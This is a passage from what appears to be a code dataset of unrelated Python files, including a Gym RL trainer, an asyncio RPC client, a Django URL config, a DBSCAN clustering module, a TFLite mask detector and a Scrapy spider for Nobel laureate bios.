dtype='float32'), [160, 240]))\n observation = observation.numpy()\n\n\n done = False\n\n while not done:\n self.local_step += 1\n self.total_step += 1\n\n if self.render == True:\n #self.env.render()\n #print(np.shape(np.array(self.env.render(mode='rgb_array'))))\n next_observation = tf.image.resize(np.array(self.env.render(mode='rgb_array'), dtype='float32'), [160,240])\n next_observation = tf.image.rgb_to_grayscale(next_observation)\n next_observation = next_observation.numpy()\n #plt.imshow(np.array(next_observation, dtype='int32')[:,:,0])\n #plt.show()\n if self.total_step <= self.algorithm.training_start:\n action = self.env.action_space.sample()\n _, reward, done, _ = self.env.step(action)\n next_observation = np.array(next_observation, dtype='float32')\n\n else:\n action = self.algorithm.get_action(observation)\n _, reward, done, _ = self.env.step(self.max_action * action)\n next_observation = np.array(next_observation, dtype='float32')\n\n self.episode_reward += reward\n\n self.algorithm.buffer.add(observation, action, reward, next_observation, done)\n observation = next_observation\n\n\n if self.total_step >= self.algorithm.training_start and self.train_mode(done, self.local_step):\n self.algorithm.train(training_num=self.algorithm.training_step)\n\n\n print(\"Episode: {}, Reward: {}, Local_step: {}, Total_step: {}\".format(self.episode, self.episode_reward, self.local_step, self.total_step))\n\n\ndef main(cpu_only = False, force_gpu = True):\n #device setting\n #################################################################################\n if cpu_only == True:\n cpu = tf.config.experimental.list_physical_devices(device_type='CPU')\n tf.config.experimental.set_visible_devices(devices=cpu, device_type='CPU')\n\n if force_gpu == True:\n gpu = tf.config.experimental.list_physical_devices('GPU')\n tf.config.experimental.set_memory_growth(gpu[0], True)\n\n #################################################################################\n\n #discrete env\n #################################################################################\n env = gym.make(\"CartPole-v0\")\n #env = gym.make(\"MountainCar-v0\")\n #env = gym.make(\"Acrobot-v1\")\n\n #################################################################################\n #continuous env\n #################################################################################\n #env = gym.make(\"Pendulum-v0\")\n #env = gym.make(\"MountainCarContinuous-v0\")\n\n #env = gym.make(\"InvertedTriplePendulumSwing-v2\")\n #env = gym.make(\"InvertedTriplePendulum-v2\")\n #env = gym.make(\"InvertedDoublePendulumSwing-v2\")\n #env = gym.make(\"InvertedDoublePendulum-v2\")\n #env = gym.make(\"InvertedPendulumSwing-v2\")#around 10000 steps\n\n #env = gym.make(\"InvertedPendulum-v2\")\n\n #env = gym.make(\"Ant-v2\")\n #env = gym.make(\"HalfCheetah-v2\")\n #env = gym.make(\"Hopper-v2\")\n #env = gym.make(\"Humanoid-v3\")\n #env = gym.make(\"HumanoidStandup-v2\")\n #env = gym.make(\"Reacher-v2\")\n #env = gym.make(\"Swimmer-v2\")\n #env = gym.make(\"Walker2d-v2\")\n #################################################################################\n\n #env = gym.make(\"Pong-v4\")\n\n #env setting\n #################################################################################\n state_dim = env.observation_space.shape[0]\n\n if isinstance(env.action_space, Discrete):\n action_dim = env.action_space.n\n max_action = 1\n min_action = 1\n discrete = True\n elif isinstance(env.action_space, Box):\n action_dim = env.action_space.shape[0]\n max_action = env.action_space.high[0]\n min_action = env.action_space.low[0]\n discrete = False\n else:\n raise NotImplementedError\n #################################################################################\n\n #algorithm for discrete env\n #################################################################################\n algorithm = DQN(state_dim, action_dim, Atari_Actor((160, 240, 1), action_dim), Atari_Actor((160, 240, 1), action_dim))\n #algorithm = DDQN(state_dim, action_dim)\n #algorithm = Dueling_DQN(state_dim, action_dim)\n #atari_algorithm = DQN(state_dim, action_dim, )\n\n\n #################################################################################\n\n #algorithm for continuous env\n #################################################################################\n #algorithm = DDPG(state_dim, action_dim)\n #algorithm = TD3(state_dim, action_dim)\n #algorithm = SAC_v1(state_dim, action_dim)\n #algorithm = SAC_v2(state_dim, action_dim, auto_alpha=True)\n\n #algorithm for both env\n #################################################################################\n #offline training only for REINFORCE, VPG, TRPO, PPO\n #algorithm = TRPO(state_dim, action_dim, discrete)\n #algorithm = PPO(state_dim, action_dim, discrete, mode='clip', clip=0.2)\n #algorithm= PPO(state_dim, action_dim, discrete, mode='Adaptive KL', dtarg=0.01)\n #algorithm = PPO(state_dim, action_dim, discrete, mode='Fixed KL', beta=3)\n #algorithm = REINFORCE(state_dim, action_dim, discrete)\n #algorithm = VPG(state_dim, action_dim, discrete)\n\n #################################################################################\n print(\"Training of\", env.unwrapped.spec.id)\n print(\"Algorithm:\", algorithm.name)\n print(\"State dim:\", state_dim)\n print(\"Action dim:\", action_dim)\n print(\"Max action:\", max_action)\n print(\"Min action:\", min_action)\n print(\"Discrete: \", discrete)\n\n trainer = Gym_trainer(env=env, algorithm=algorithm, max_action=max_action, min_action=min_action, train_mode='offline', render=True)\n trainer.run()\n\n\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"97811622","text":"# Finding lowest number of a list.\n\nnumbers = [-5, 23, 0, -9, 12, 99, 105, -43]\nlength = len(numbers)\nmin = numbers[0]\ni = 1\nwhile i < length:\n if min > numbers[i]:\n min = numbers[i]\n i += 1\n else:\n min = min\n i += 1\nprint(\"Minimum of the list is: \", min)\n","sub_path":"exercise/min.py","file_name":"min.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"434989309","text":"import os\n\n\ndef rename_files():\n\ttarget_path = \"./prank/prank\"\n\n\tfile_list = os.listdir(target_path)\n\n\tstart_path = os.getcwd()\n\tos.chdir(target_path)\n\n\tfor file_name in file_list:\n\t\tnew_name = file_name.translate(None, \"0123456789\")\n\t\tos.rename(file_name, new_name)\n\t\tprint (\"Rename file \" + file_name + \" to \" + new_name)\n\n\tos.chdir(start_path)\n\nrename_files()","sub_path":"modulo_1/aula_5/prank/rename_files.py","file_name":"rename_files.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"198425449","text":"import io\nimport logging\nimport struct\nimport asyncio\nfrom time import monotonic\n\nimport msgpack\n\nfrom aiomisc.entrypoint import entrypoint\n\n\nlog = logging.getLogger('client')\n\n\nclass RPCClient:\n HEADER = struct.Struct(\">I\")\n\n def __init__(self, reader: asyncio.StreamReader,\n writer: asyncio.StreamWriter,\n loop: asyncio.AbstractEventLoop = None):\n\n self.reader = reader\n self.writer = writer\n self.packer = msgpack.Packer(use_bin_type=True)\n self.unpacker = msgpack.Unpacker(raw=False)\n self.serial = 0\n self.futures = {}\n self.loop = loop or asyncio.get_event_loop()\n self.reader_task = self.loop.create_task(self._response_reader())\n\n async def _response_reader(self):\n try:\n while True:\n body_size = self.HEADER.unpack(\n await self.reader.readexactly(self.HEADER.size)\n )[0]\n\n self.unpacker.feed(\n await self.reader.readexactly(body_size)\n )\n\n body = self.unpacker.unpack()\n\n future = self.futures.pop(body['id'], None)\n\n if future is None:\n continue\n\n if 'error' in body:\n future.set_exception(Exception(\n body['error']['type'],\n *body['error']['args']\n ))\n continue\n\n future.set_result(body['result'])\n finally:\n while self.futures:\n _, future = self.futures.popitem()\n\n if future.done():\n continue\n\n future.set_exception(ConnectionAbortedError)\n\n async def close(self):\n self.writer.write(self.HEADER.pack(0))\n\n self.reader_task.cancel()\n await asyncio.gather(self.reader_task, return_exceptions=True)\n\n self.loop.call_soon(self.writer.close)\n self.writer.write_eof()\n self.writer.close()\n\n def __call__(self, method, **kwargs):\n self.serial += 1\n\n self.futures[self.serial] = self.loop.create_future()\n\n with io.BytesIO() as f:\n body = self.packer.pack({\n 'id': self.serial,\n 'method': method,\n 'params': kwargs,\n })\n\n f.write(self.HEADER.pack(len(body)))\n f.write(body)\n\n self.writer.write(f.getvalue())\n\n return self.futures[self.serial]\n\n\nasync def main(host, port):\n log.info('Connecting to %s:%d', host, port)\n reader, writer = await asyncio.open_connection(host, port)\n client = RPCClient(reader, writer)\n\n call_count = 300\n\n delta = - monotonic()\n\n for i in range(call_count):\n await asyncio.gather(*[\n client('multiply', x=120000, y=1000000) for _ in range(call_count)\n ])\n\n delta += monotonic()\n\n total_request_sent = (call_count ** 2)\n\n log.info(\"Total executed %d requests on %.3f\", total_request_sent, delta)\n log.info(\"RPS: %.3f\", total_request_sent / delta)\n\n await client.close()\n log.info('Close connection')\n\n\nif __name__ == '__main__':\n with entrypoint() as loop:\n loop.run_until_complete(main(\"::1\", 5678))\n","sub_path":"examples/rpc/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"42838407","text":"# Copyright (c) 2015 App Annie Inc. All rights reserved.\nimport re\nfrom tests.qa.pages.storestats.common_page import SSCommonPage\nfrom tests.qa.utils import logger\n\n\nclass FeatureHistoryPage(SSCommonPage):\n \"\"\"\n Page structure:\n 1 Global level: Header/Footer, Sidebar, App Container\n 2 In app container: App info, App dashboard\n 3 In app dashboard: Dashboard header, Dashboard control group, Dashboard view\n 3.1 dashboard header\n 3.2 In dashboard control group: control group buttons, dashboard subtitle\n 3.3 In dashboard view: chart, table\n\n This page object aims to structure in 3\n\n Loading procedure in 3,1 & 3.2\n this section will follow the whole page and no ajax made.\n\n Loading procedure in 3.3\n 1 play loading animation\n 2 set width of div contains loading animation to 0\n 3 show chart and table / set contains(a div element) of error message display:none to display:block\n\n Loading procedure tricked by control group\n seam as above\n\n Loading procedure tricked by chart control (Reach / Frequency button)\n hide chart\n play loading animation in chart container\n show chart / set contains(a div element) of error message display:none to display:block\n \"\"\"\n\n url = '/apps/{}/{}/{}/featured'\n https = False\n\n css_dashboard_header = \".dashboard-header\"\n\n css_control_group = \".control-group\"\n css_control_group_breakdown = css_control_group + ' div[data-qa-element=\"breakdown\"]'\n css_control_group_country = css_control_group + ' div[data-qa-element=\"country\"] .current'\n css_control_group_category = css_control_group + ' div[data-qa-element=\"category\"] .current'\n css_control_group_type = css_control_group + ' div[data-qa-element=\"type\"] .current'\n css_control_group_device = css_control_group + ' div[data-qa-element=\"device\"] .current'\n css_control_group_date = css_control_group + ' div[data-qa-element=\"date\"] .current'\n\n css_dashboard_subtitle = \".dashboard-sub-header\"\n css_chart = \".chart-container\"\n css_table = \".table-container\"\n css_table_row = \".main-row\"\n\n css_popup = \".aa-popup\"\n css_popup_item = css_popup + \" .aa-popup-body li span\"\n css_popup_col = css_popup + \" .picker-col\"\n\n css_date_selector = \".aa_selector\"\n css_date_input_start_date = css_date_selector + \" .start-input-date\"\n css_date_input_end_date = css_date_selector + \" .end-input-date\"\n css_date_input_done = css_date_selector + \" .ui-datepicker-close\"\n\n def get_control_group(self):\n return self.find_element_by_css(self.css_control_group)\n\n def get_control_group_country(self):\n return self.find_element_by_css(self.css_control_group_country)\n\n def get_control_group_category(self):\n return self.find_element_by_css(self.css_control_group_category)\n\n def get_control_group_type(self):\n return self.find_element_by_css(self.css_control_group_type)\n\n def get_control_group_device(self):\n return self.find_element_by_css(self.css_control_group_device)\n\n def get_control_group_date(self):\n return self.find_element_by_css(self.css_control_group_date)\n\n def get_dashboard_subtitle(self):\n return self.find_element_by_css(self.css_dashboard_subtitle)\n\n def get_control_group_breakdown_item(self, name):\n breakdown = self.find_element_by_css(self.css_control_group_breakdown)\n return self.find_sub_element_by_xpath('//li/span[text()=\"{}\"]'.format(name), breakdown)\n\n # need call get_control_group_breakdown_item(\"date\").click() first\n def fill_control_group_date(self, start_date, end_date):\n beg = self.find_element_by_css(self.css_date_input_start_date)\n beg.clear()\n beg.send_keys(start_date)\n end = self.find_element_by_css(self.css_date_input_end_date)\n end.clear()\n end.send_keys(end_date)\n\n def click_control_group_date_done_button(self):\n self.find_element_by_css(self.css_date_input_done).click()\n\n def click_control_group_popup_item(self, name):\n items = self.find_elements_by_css(self.css_popup_item)\n for item in items:\n if item.text.strip() == name:\n item.click()\n return\n raise Exception\n\n def click_control_group_subcategory(self, *categories):\n queue = list(categories)\n current = 0\n\n while current < len(queue):\n cols = self.find_elements_by_css(self.css_popup_col)\n cells = cols[current].find_elements_by_css_selector(\"li span\")\n for cell in cells:\n if cell.text.strip() == queue[current]:\n if current == len(queue) - 1:\n cell.click()\n return\n else:\n cell.find_element_by_xpath(\"../..\").find_element_by_css_selector(\"a.indicator\").click()\n break\n else:\n raise Exception(\"Category not found\")\n current += 1\n\n def get_table_content(self):\n ret = []\n items = self.find_elements_by_css(self.css_table_row)\n for row in items:\n tds = row.find_elements_by_tag_name('td')\n ret.append([x.text.strip() for x in tds[1:4]])\n return ret\n","sub_path":"tests/qa/pages/storestats/feature_history_page.py","file_name":"feature_history_page.py","file_ext":"py","file_size_in_byte":5317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"143175270","text":"from itertools import zip_longest\n\n\nclass ImproperNodeException(Exception):\n \"\"\"Just cause...\"\"\"\n\n\nclass Node:\n\n def __init__(self, d):\n self.data = d\n self.next = None\n\n def __repr__(self):\n return '[%s]' % self.data\n\n\nclass LinkedList:\n\n def __init__(self, values=None):\n self.head = None\n if values:\n for value in values:\n self.add(value)\n\n def __eq__(self, other):\n self_values = list(self.values())\n other_values = list(other.values())\n if len(self_values) != len(other_values):\n return False\n\n for v1, v2 in zip(self_values, other_values):\n if v1 != v2:\n return False\n\n return True\n\n\n\n\n\n def __add__(self, other):\n elements = zip_longest(\n reversed(list(self.values())),\n reversed(list(other.values())),\n fillvalue=0\n )\n remainder = 0\n to_return = LinkedList()\n\n for v1, v2 in elements:\n\n if not isinstance(v1, int) or not isinstance(v2, int):\n raise TypeError('This only works for integers.')\n\n if v1 > 9 or v2 > 9:\n raise TypeError('This only works for integers less than 10.')\n\n total = (v1 + v2 + remainder)\n val = total % 10\n remainder = 1 if total > 10 else 0\n to_return.add(val)\n\n if remainder:\n to_return.add(remainder)\n\n return to_return\n\n def __len__(self):\n return len(list(iter(self)))\n\n def __getitem__(self, index):\n return list(iter(self))[index]\n\n def __iter__(self):\n node = self.head\n while node:\n yield node\n node = node.next\n\n def values(self):\n for node in self:\n yield node.data\n\n def add(self, d):\n node = Node(d)\n node.next = self.head\n self.head = node\n\n @staticmethod\n def delete(node):\n if not node or not node.next:\n raise ImproperNodeException\n\n node.data = node.next.data\n node.next = node.next.next\n\n def kth_to_last(self, k, node=None):\n\n head = node or self.head\n count = 1\n if not head.next:\n return 1\n else:\n count += self.kth_to_last(k, head.next)\n if count == k:\n return head\n return count\n\n def remove_duplicates(self):\n\n data_set = set()\n prev_node = None\n\n for node in self:\n if node.data in data_set:\n prev_node.next = node.next\n else:\n data_set.add(node.data)\n prev_node = node\n\n def partition(self, value):\n \"\"\"Shift linked list so that all elements less than value are\n before all elements greater than or equal to value.\n\n :param value: Partition value\n\n e.g 3 > 2 > 2 > 10 > 3 > 1 [partition = 3]\n output = 2 > 2 > 1 > 3 > 3 > 10\n \"\"\"\n\n less_than = LinkedList()\n greater_than = LinkedList()\n\n for node in self:\n if node.data < value:\n less_than.add(node.data)\n else:\n greater_than.add(node.data)\n\n less_than[-1].next = greater_than.head\n\n return less_than\n\n def __repr__(self):\n node = self.head\n nodes = []\n while node:\n nodes.append(str(node))\n node = node.next\n return ' -> '.join(nodes)\n\n\n\n\n\n\n\n","sub_path":"linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"58042395","text":"from django.urls import path\nfrom . import views\n\"\"\"\nRemember that pages like wish list, which shows a list and also accepts\nboth GET and POST request.\nGET request, show form and list of places\nPOST request, add new place to DB then redirects to a list of places\n\n\"\"\"\n\nurlpatterns = [\n path('',views.place_list, name='place_list'), # Make sure to add commas next to each path.\n path('visited', views.places_visited, name = 'places_visited'), # name refers to the url path \n path('place//was_visited', views.place_was_visited, name='place_was_visited'), ## Created for the \"Visited!\" button\n path('place/', views.place_details, name ='place_details'),\n path('place//delete', views.delete_place, name='delete_place'),\n]","sub_path":"wishlist/travel_wishlist/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"274573379","text":"from __future__ import division, print_function\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.cluster import DBSCAN\n\nfrom . import markings, p4io\nfrom .exceptions import NoDataToClusterError, UnknownClusteringScopeError\n\nmatplotlib.style.use('bmh')\n\n\nclass DBScanner(object):\n\n marking_cols = {'fan': 'angle spread distance'.split(),\n 'blotch': 'angle radius_1 radius_2'.split()}\n MarkingClass = {'fan': markings.Fan,\n 'blotch': markings.Blotch}\n\n def __init__(self, data, kind, eps=10, min_samples=3,\n scope='planet4',\n ax=None, linestyle='-', quiet=True):\n self.data = data\n self.kind = kind # fans or blotches\n self.eps = eps\n self.min_samples = min_samples\n if scope == 'planet4':\n self.coords = ['x', 'y']\n elif scope == 'hirise':\n self.coords = ['hirise_x', 'hirise_y']\n else:\n raise UnknownClusteringScopeError\n self.scope = scope\n self.ax = ax\n self.linestyle = linestyle\n self.quiet = quiet\n\n # these lines execute the clustering\n self.get_current_X()\n self.run_DBSCAN()\n self.post_analysis()\n\n def get_current_X(self):\n current_X = self.data[self.coords].values\n if len(current_X) == 0:\n raise NoDataToClusterError\n self.current_X = current_X\n\n def run_DBSCAN(self):\n db = DBSCAN(self.eps, self.min_samples).fit(self.current_X)\n labels = db.labels_.astype('int')\n self.core_samples = db.core_sample_indices_\n unique_labels = set(labels)\n self.n_clusters = len(unique_labels) - (1 if -1 in labels else 0)\n self.labels = labels\n self.unique_labels = unique_labels\n if not self.quiet:\n print(\"Estimated number of clusters:\", self.n_clusters)\n\n def post_analysis(self):\n colors = plt.cm.Spectral(np.linspace(0, 1, len(self.unique_labels)))\n reduced_data = []\n n_rejected = 0\n for k, color in zip(self.unique_labels, colors):\n label_members = [i[0] for i in np.argwhere(self.labels == k)]\n if k == -1: # i.e. if it's noise\n n_rejected = len(label_members)\n if self.ax:\n self.process_plotting(k, label_members)\n if k > -0.5: # i.e. if it's not noise marking\n cluster = self.get_mean_marking(label_members)\n cluster.n_members = len(label_members)\n reduced_data.append(cluster)\n if self.ax:\n self.process_cluster_plotting(cluster, color)\n if self.ax:\n markings.set_subframe_size(self.ax)\n self.reduced_data = reduced_data\n self.n_rejected = n_rejected\n\n @property\n def n_reduced_data(self):\n return len(self.reduced_data)\n\n def get_mean_marking(self, label_members):\n # what columns to pick for averaging. Depends on\n # what kind (fans/blotches) we have:\n cols = self.coords + self.marking_cols[self.kind]\n clusterdata = self.data[cols].iloc[label_members]\n meandata = clusterdata.mean()\n if self.scope == 'hirise':\n meandata['x'] = meandata.hirise_x\n meandata['y'] = meandata.hirise_y\n return self.MarkingClass[self.kind](meandata)\n\n def process_cluster_plotting(self, cluster, color):\n cluster.set_color(color)\n if self.kind == 'blotch':\n self.ax.add_artist(cluster)\n else:\n self.ax.add_line(cluster)\n cluster.add_semicircle(self.ax, color=color)\n cluster.add_mean_wind_pointer(self.ax, color=color,\n ls=self.linestyle)\n\n def process_plotting(self, k, label_members):\n if k == -1: # process noise markers\n color = 'w'\n markersize = 5\n for i in label_members:\n x = self.current_X[i]\n if i in self.core_samples and k != -1:\n markersize = 8\n else:\n markersize = 5\n self.ax.plot(x[0], x[1], 'o', markerfacecolor=color,\n markedgecolor='k', markersize=markersize)\n\n\nclass ClusteringManager(object):\n def __init__(self, dbname, scope='hirise'):\n self.db = p4io.DBManager(dbname)\n self.dbname = dbname\n self.scope = scope\n self.confusion = []\n self.dbscanners = []\n self.clustered_fans = []\n self.clustered_blotches = []\n\n @property\n def n_clustered_fans(self):\n return len(self.clustered_fans)\n\n @property\n def n_clustered_blotches(self):\n return len(self.clustered_blotches)\n\n def cluster_data(self, data):\n for kind in ['fan', 'blotch']:\n markings = data[data.marking == kind]\n dbscanner = DBScanner(markings, kind, scope=self.scope)\n self.confusion.append((self.data_id, kind, len(markings),\n dbscanner.n_reduced_data,\n dbscanner.n_rejected))\n if kind == 'fan':\n self.clustered_fans.extend(dbscanner.reduced_data)\n else:\n self.clustered_blotches.extend(dbscanner.reduced_data)\n\n def cluster_image_id(self, image_id):\n self.data_id = image_id\n self.p4id = markings.ImageID(image_id, self.dbname)\n self.cluster_data(self.p4id.data)\n\n def cluster_image_name(self, image_name):\n data = self.db.get_image_name_markings(image_name)\n self.data_id = image_name\n self.cluster_data(data)\n\n def cluster_all(self):\n image_names = self.db.image_names\n for i, image_name in enumerate(image_names):\n print('{:.1f}'.format(100 * i / len(image_names)))\n data = self.db.get_image_name_markings(image_name)\n self.data_id = image_name\n self.cluster_data(data)\n\n\ndef gold_star_plotter(gold_id, axis, blotches=True, kind='blotches'):\n for goldstar, color in zip(markings.gold_members,\n markings.gold_plot_colors):\n if blotches:\n gold_id.plot_blotches(user_name=goldstar, ax=axis,\n user_color=color)\n if kind == 'fans':\n gold_id.plot_fans(user_name=goldstar, ax=axis, user_color=color)\n markings.gold_legend(axis)\n\n\ndef main():\n gold_ids = p4io.common_gold_ids()\n\n p4img = markings.ImageID(gold_ids[10])\n golddata = p4img.data[p4img.data.user_name.isin(markings.gold_members)]\n golddata = golddata[golddata.marking == 'fan']\n # citizens = set(p4img.data.user_name) - set(markings.gold_members)\n\n # create plot window\n fig, ax = plt.subplots(ncols=2, nrows=2, figsize=(12, 10))\n fig.tight_layout()\n axes = ax.flatten()\n\n # fill images, 0 and 2 get it automatically\n for i in [1, 3]:\n p4img.show_subframe(ax=axes[i])\n\n # remove pixel coord axes\n for ax in axes:\n ax.axis('off')\n\n # citizen stuff\n p4img.plot_fans(ax=axes[0])\n axes[0].set_title('Citizen Markings')\n DBScanner(p4img.get_fans(), 'fan', ax=axes[1], eps=7, min_samples=5,\n linestyle='-')\n axes[1].set_title('All citizens clusters (including science team)')\n\n # gold stuff\n gold_star_plotter(p4img, axes[2], fans=True, blotches=False)\n axes[2].set_title('Science team markings')\n DBScanner(golddata, 'fan', ax=axes[1], min_samples=2, eps=11,\n linestyle='--')\n axes[3].set_title('Science team clusters')\n\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"planet4/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":7683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"560016960","text":"from rest_framework.routers import DefaultRouter\nfrom django.conf.urls.static import static\n\nfrom django.urls import include, path\nfrom django.conf import settings\nfrom rest_framework_simplejwt.views import (\n TokenVerifyView\n)\nfrom . import views\n\nrouter = DefaultRouter(trailing_slash=False)\nrouter.register('products', views.ProductViewSet, base_name='products')\nrouter.register('orders', views.OrderViewSet, base_name='orders')\nrouter.register('onlineOrders', views.OnlineOrderViewSet, base_name='online_orders')\nrouter.register('vouchers', views.VoucherViewSet, base_name='vouchers')\nrouter.register('UUID', views.UUIDView, base_name='uuids')\nrouter.register('productlist', views.ProductVoucherViewSet, base_name='products_vouchers')\n\n\nurlpatterns = [\n path('login/', views.LoginAPI.as_view(), name='api_login'),\n path('register/', views.RegisterAPI.as_view(), name='api_register'),\n path('logout/', views.LogoutAPI, name='api_logout'),\n path('me/', views.MeView.as_view(), name='api_me'),\n path('categories/', views.CategoryView.as_view(), name='api_category'),\n path('orderStatus/', views.OrderStatusView.as_view(), name='api_status'),\n path('onlineOrderStatus/', views.OnlineOrderStatusView.as_view(), name='api_status_order_voucher'),\n path('productStatuses/', views.ProductStatusView.as_view(), name='api_status_product'),\n path('suppliers/', views.SupplierView.as_view(), name='api_suppliers'),\n path('token/', views.TokenUserView.as_view(), name='token_obtain_pair'),\n path('token/verify', TokenVerifyView.as_view(), name='token_verify'),\n path('onlineOrderRef/', views.OnlineOrderRefView.as_view(), name='online_order_ref'),\n path('orderRef/', views.OrderRefView.as_view(), name='order_ref'),\n path('redeem/', views.RedeemView.as_view(), name='redeem_order'),\n path('onlineOrderTx/', views.UsedOnlineOrderView.as_view(), name='change_online_order_status')\n]\nurlpatterns += router.urls\n\n","sub_path":"demo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"321833453","text":"import cv2\nimport numpy as np\nimport tflite_runtime.interpreter as tflite\nimport urllib3\nimport time\n\n\ndef requestToThingSpeak():\n # upload value to thingSpeak\n url = \"https://api.thingspeak.com/update?api_key=\"\n key = \"your key\"\n val = f\"&field1={noMaskedNum}\"\n r = urllib3.PoolManager().request(\"GET\", url + key + val)\n print(r.status)\n\n\n# init\nMODEL_PATH = \"myModel/model.tflite\"\nFACE_CASCADE_PATH = \"myModel/haarcascade_frontalface_default.xml\"\n\n# load model\ninterpreter = tflite.Interpreter(model_path=MODEL_PATH)\ninterpreter.allocate_tensors()\n# set label\nlabel = ['mask', 'face']\n# load face roi detector\nface_cascade = cv2.CascadeClassifier(FACE_CASCADE_PATH)\n# Capture video\ncap = cv2.VideoCapture(0)\n\n# first upload value\nnoMaskedNum = 0\n# requestToThingSpeak()\ns = time.time()\n\nwhile True:\n # for each frame\n ret, frame = cap.read()\n # fram to gray color\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # detect face roi\n faces = face_cascade.detectMultiScale(gray, 1.3, 4)\n\n # reset\n noMaskedNum = 0\n\n # detect all faces is masked or nomasked\n for (fx, fy, fw, fh) in faces:\n # for each face\n # crop face\n crop = frame[fy:fy+fh, fx:fx+fh]\n crop = cv2.resize(crop, (128, 128))\n crop = np.reshape(crop, [1, 128, 128, 3]) / 255.0\n crop = crop.astype('float32')\n # put crop to model\n interpreter.set_tensor(interpreter.get_input_details()[0]['index'], crop)\n # error msg\n interpreter.invoke()\n # get result of model\n output = interpreter.get_tensor(interpreter.get_output_details()[0]['index'])[0]\n # print ans\n print(output, \" \", np.argmax(output), \" \", label[np.argmax(output)])\n # count nomasked\n if np.argmax(output) == 1:\n noMaskedNum += 1\n # draw face roi and set text of model's result\n cv2.rectangle(frame, (fx, fy), (fx + fw, fy + fh), (255, 0, 0), 2)\n cv2.putText(frame, label[np.argmax(output)], (fx, fy), cv2.FONT_HERSHEY_SIMPLEX, 1, (200, 255, 255), 2, cv2.LINE_AA)\n\n # upload value delay 15s (thingSpeak default)\n # !!! IMPORTANT !!!\n # It will take 0.88 ~ 1s time to upload\n # that mean the screen will sleep when it upload.\n # It can be solved by using threading\n # but sometime will encounter the value init\n # so will got incorrect value.\n # In fact, I was lazy to solve it XD\n # !!! IMPORTANT !!!\n\n # c = time.time()\n # if c - s > 15.5:\n # requestToThingSpeak()\n # s = c\n\n # show frame\n cv2.imshow('img', frame)\n # exit()\n if cv2.waitKey(1) & 0xFF == 27:\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"detectMask.py","file_name":"detectMask.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"539306666","text":"#! python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 23 06:26:28 2021\n\n@author: sconcannon\n\nfollowing ch6 of Data Visualization with Python and Javascript\ndownloads bios and images of Nobel prize winners, using Scrapy\n\"\"\"\nimport scrapy\nimport re\n\nBASE_URL = 'https://en.wikipedia.org'\n\nclass NWinnerBio(scrapy.Item):\n link = scrapy.Field()\n name = scrapy.Field()\n mini_bio = scrapy.Field()\n image_urls = scrapy.Field()\n bio_image = scrapy.Field()\n images = scrapy.Field()\n \nclass NWinnerSpiderBio(scrapy.Spider):\n \"\"\" Scrapes the country and link text of the Nobel winners \"\"\"\n name = 'nwinners_minibio'\n allowed_domains = ['en.wikipedia.org']\n start_urls = [\"https://en.wikipedia.org/wiki/List_of_Nobel_laureates_by_country\"]\n \n def parse(self, response):\n filename = response.url.split('/')[-1]\n h3s = response.xpath('//h3')\n \n for h3 in h3s:\n country = h3.xpath('span[@class=\"mw-headline\"]/text()').extract()\n if country:\n winners = h3.xpath('following-sibling::ol[1]')\n for w in winners.xpath('li'):\n wdata = {}\n wdata['link'] = BASE_URL + w.xpath('a/@href').extract()[0]\n # Process the winner's bio page with the get_mini_bio method\n request = scrapy.Request(\n wdata['link'],\n callback=self.get_mini_bio)\n request.meta['item'] = NWinnerBio(**wdata)\n yield request\n \n def get_mini_bio(self, response):\n \"\"\" Get the winner's bio-text and photo \"\"\"\n \n BASE_URL_ESCAPED = 'https:\\/\\/en.wikipedia.org'\n item = response.meta['item']\n item['image_urls'] = []\n img_src = response.xpath('//table[contains(@class, \"infobox\")]//img/@src')\n if img_src:\n item['image_urls'] = ['https:' + img_src[0].extract()]\n \n paras = response.xpath('//div[@class=\"mw-parser-output\"]/*')\n mini_bio = ''\n\n for x in range(0,len(paras)):\n if paras[x].xpath('@id').extract() == ['toc']:\n break # stop after the intro \n if not paras[x].xpath('@class'): # bio intro paras have no classes\n mini_bio += paras[x].extract()\n \n # correct for wiki-links\n mini_bio = mini_bio.replace('href=\"/wiki', 'href=\"' + BASE_URL + '/wiki')\n mini_bio = mini_bio.replace('href=\"#', item['link'] + '#')\n item['mini_bio'] = mini_bio\n yield item","sub_path":"nobel_winners/spiders/nwinners_minibio_spider.py","file_name":"nwinners_minibio_spider.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"555426996","text":"import json\r\nimport string, random\r\nimport datetime\r\n\r\nfrom django.conf import settings\r\n\r\nfrom rest_framework.views import APIView\r\nfrom rest_framework.generics import ListAPIView\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.reverse import reverse\r\nfrom rest_framework import status\r\n\r\nfrom 